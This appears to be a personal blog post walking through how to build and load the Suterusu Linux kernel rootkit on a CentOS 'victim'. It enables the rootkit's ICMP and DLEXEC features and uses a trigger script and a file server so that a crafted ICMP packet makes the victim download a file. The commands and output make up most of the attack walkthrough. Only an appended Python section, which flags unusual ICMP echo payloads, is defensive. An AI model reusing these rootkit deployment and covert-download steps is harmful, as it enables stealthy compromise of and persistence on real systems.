Sunday, August 10, 2014

An awesome Linux kernel rootkit: Suterusu


I've been fuc*ing busy since I left SuSE about two months ago. I have a lot of time to hack/learn anything I want. Well, a rootkit is one of my TODO things, as always. I wrote a dumb rootkit half a year ago. It uses a good old method to hide files: hijacking some syscalls. There's a better solution called "inline hook". Suterusu is the one that implements an inline hook framework. I don't want to explain the details of how Suterusu was implemented, 'cause no one (in most cases) would do the job better than the original author: Michael Coppola already wrote a good article, "Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM".

I always want to make some open source rootkits work on the latest version of GNU/Linux. Damn... I'd be exhausted if I really did that. There are a bunch of rootkits (adore-ng, ddrk, kbeast-v1, wnps, etc.) out there that have been outdated for years. Although you might find some "modern" ones like maK_it, kernel-rootkit-2.6.32, etc... but... there's always an annoying "but"... these rootkits either lack an inline hook framework or can't support diverse Linux kernel versions. I've tested Suru on a dozen different Linux kernels, from 2.6.35 to 3.13.1. Now I'm going to share two stories of mine (of course, they're Suru-related ;-)):

1. A friend asked for advice about rootkit selection, and of course I'd never hesitate to tell him to use Suru. When he tried to use it, he found out he couldn't compile it on kernel-3.14.1. Then I modified a few lines of code and it worked.

2. Another friend (a pentester) asked me if I could make any rootkit work on CentOS 6.5 with 2.6.32-431.el6 x86_64. I tried Suru and found out it did not support 2.6.32 yet. Then I added less than 100 LOC and it worked.

Suru is an awesome rootkit. I'm sure a lot of people are using it. Today I found out about two features of Suru called "ICMP" and "DLEXEC" that I had never looked into. A friend (still that pentester) told me it can be used as a covert channel to transfer files. I wrote a trigger program that crafts a specific ICMP header/payload and sends it to the "victim server". When the victim receives the packet, it will download a file from a specific server.

---------------------------------------------------------------------
1. Download Suterusu on both the "victim" and the "attacker".

2. The victim is using CentOS 6.5:
[root@centos-rktesting ~]# uname -r
2.6.32-431.el6.x86_64


2.1 Install some necessary packages:
yum install -y kernel-devel.x86_64 gcc vim

2.2 Compile & load the rootkit:
[root@centos-rktesting suterusu]# make linux-x86_64 KDIR=/usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ ICMP=y DLEXEC=y
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_DLEXEC_ -D_CONFIG_ICMP_" -C /usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ M=/root/suterusu modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'
  CC [M]  /root/suterusu/main.o
  CC [M]  /root/suterusu/util.o
  CC [M]  /root/suterusu/module.o
  CC [M]  /root/suterusu/dlexec.o
  CC [M]  /root/suterusu/icmp.o
  LD [M]  /root/suterusu/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/suterusu/suterusu.mod.o
  LD [M]  /root/suterusu/suterusu.ko.unsigned
  NO SIGN [M] /root/suterusu/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'

[root@centos-rktesting suterusu]# insmod suterusu.ko
 

3. The attacker can use any GNU/Linux distro you want. Compile the file server and designate the file you want to be transferred:
shawn@shawn-fortress /tmp/suterusu $ sudo ./a.out 8556 README.md
Bound to port 8556, waiting for connection...


3.1 Open a new terminal:
shawn@shawn-fortress /tmp/suterusu $ cd test/
shawn@shawn-fortress /tmp/suterusu/test $ ls
trigger_icmp_covert.py
shawn@shawn-fortress /tmp/suterusu/test $ ./trigger_icmp_covert.py


4. Go to the victim's machine and check:
[root@centos-rktesting ~]# cat /root/.tmp
Suterusu
========

Typical compilation steps:

...........................................................
.................................................................

---------------------------------------------------------------------

That's it! Show time is over! It's quite simple, eh? I really appreciate that Michael Coppola released Suterusu under a free/open source software license. And I also thank him for bringing us good writing ;-)

btw: What's next? I'll probably go try some memory forensics, to see if I can hunt some rootkits ;-)
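
One way to hunt for the ICMP-triggered download described above from the network side, as an added example that is not from the original post or from Suterusu. The post does not give the trigger's packet layout, so the code assumes only that the trigger is an echo request carrying non-standard data, and flags echo requests whose payload matches neither the stock Windows nor the iputils ping pattern; all function names and sample packets are constructed for illustration.

```python
import struct

WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"  # stock Windows ping data

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum used by ICMP (RFC 792)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def looks_like_stock_ping(payload: bytes) -> bool:
    """Heuristic: empty, Windows-style or iputils-style echo data."""
    if not payload or WINDOWS_PING.startswith(payload):
        return True
    # iputils ping: 8- or 16-byte timestamp, then the byte at offset i equals i.
    for ts_len in (8, 16):
        tail = payload[ts_len:]
        if tail and all(b == ((ts_len + i) & 0xFF) for i, b in enumerate(tail)):
            return True
    return False

def inspect_icmp(icmp: bytes) -> str:
    """Classify one ICMP message (the bytes after the IP header)."""
    if len(icmp) < 8:
        return "malformed"
    mtype, code = struct.unpack("!BB", icmp[:2])
    if inet_checksum(icmp) != 0:       # a valid message sums to zero
        return "bad-checksum"
    if (mtype, code) != (8, 0):        # only echo requests are examined
        return "ignored"
    return "ok" if looks_like_stock_ping(icmp[8:]) else "suspicious"

def build_icmp(payload: bytes, mtype: int = 8, ident: int = 0x1234, seq: int = 1) -> bytes:
    """Constructed sample generator: ICMP message with a valid checksum."""
    cksum = inet_checksum(struct.pack("!BBHHH", mtype, 0, 0, ident, seq) + payload)
    return struct.pack("!BBHHH", mtype, 0, cksum, ident, seq) + payload

# Constructed samples, not captured traffic.
SAMPLES = {
    "linux-ping": build_icmp(bytes(16) + bytes(range(16, 56))),
    "windows-ping": build_icmp(WINDOWS_PING),
    "odd-payload": build_icmp(b"\x00constructed-non-ping-payload"),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:13s} {inspect_icmp(pkt)}")
```

Monitoring tools and `ping -p`/`-s` users also produce non-default payloads, so a "suspicious" verdict is a lead to correlate with an unexpected outbound connection from the same host, not proof of a rootkit.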

Have fun & good hunting!!!

May the L0rd's hacking spirit guide us!!!

Further readings:
[1] RFC-792
http://tools.ietf.org/html/rfc792

[2] Python documentation:
https://docs.python.org/2/library/struct.html

[3] TCP/IP protocols
http://www.protocols.com/pbook/tcpip3.htm

[4] Sock-RAW
http://sock-raw.org/papers/sock_raw